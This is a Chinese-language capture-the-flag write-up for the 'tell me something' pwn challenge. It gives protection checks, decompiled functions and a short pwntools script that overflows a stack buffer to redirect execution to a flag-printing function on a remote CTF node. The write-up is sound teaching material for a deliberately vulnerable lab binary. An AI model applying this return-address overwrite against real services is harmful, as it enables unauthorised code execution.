jarvisoj tell me something
# jarvisoj tell me something
# 前提
# 查看文件保护
[*] '/root/pwn/buuctf/jarvisoj_tell_me_something/guestbook'
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
1
2
3
4
5
6
2
3
4
5
6
# 静态分析
主函数如下
int __cdecl main(int argc, const char **argv, const char **envp)
{
__int64 v4; // [rsp+0h] [rbp-88h]
write(1, "Input your message:\n", 0x14uLL);
read(0, &v4, 0x100uLL);
return write(1, "I have received your message, Thank you!\n", 0x29uLL);
}
1
2
3
4
5
6
7
8
2
3
4
5
6
7
8
good_game函数如下
int good_game()
{
FILE *v0; // rbx
int result; // eax
char buf; // [rsp+Fh] [rbp-9h]
v0 = fopen("flag.txt", "r");
while ( 1 )
{
result = fgetc(v0);
buf = result;
if ( (_BYTE)result == -1 )
break;
write(1, &buf, 1uLL);
}
return result;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
readmessage函数如下
ssize_t readmessage()
{
__int64 v1; // [rsp+0h] [rbp-88h]
return read(0, &v1, 0x100uLL);
}
1
2
3
4
5
6
2
3
4
5
6
# 思路分析
- 目前信息:
main函数可溢出good_game函数可直接打印flag- No PIE
- 思路:
- 溢出控制程序执行流到
good_game即可获得flag
- 溢出控制程序执行流到
# exp
from pwn import *
from LibcSearcher import *
context.terminal = ['tmux', 'splitw', '-h']
context(os='linux', arch='amd64', log_level='debug')
pwnfile = '/root/pwn/buuctf/jarvisoj_tell_me_something/guestbook'
io=remote('node4.buuoj.cn',28491)
# io = process(pwnfile)
elf = ELF(pwnfile)
padding = 136
good_game=elf.symbols['good_game']
payload=flat(['a'*padding,good_game])
io.recv()
io.send(payload)
io.interactive()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
2
3
4
5
6
7
8
9
10
11
12
13
14
上次更新: 2022/08/15, 00:29:49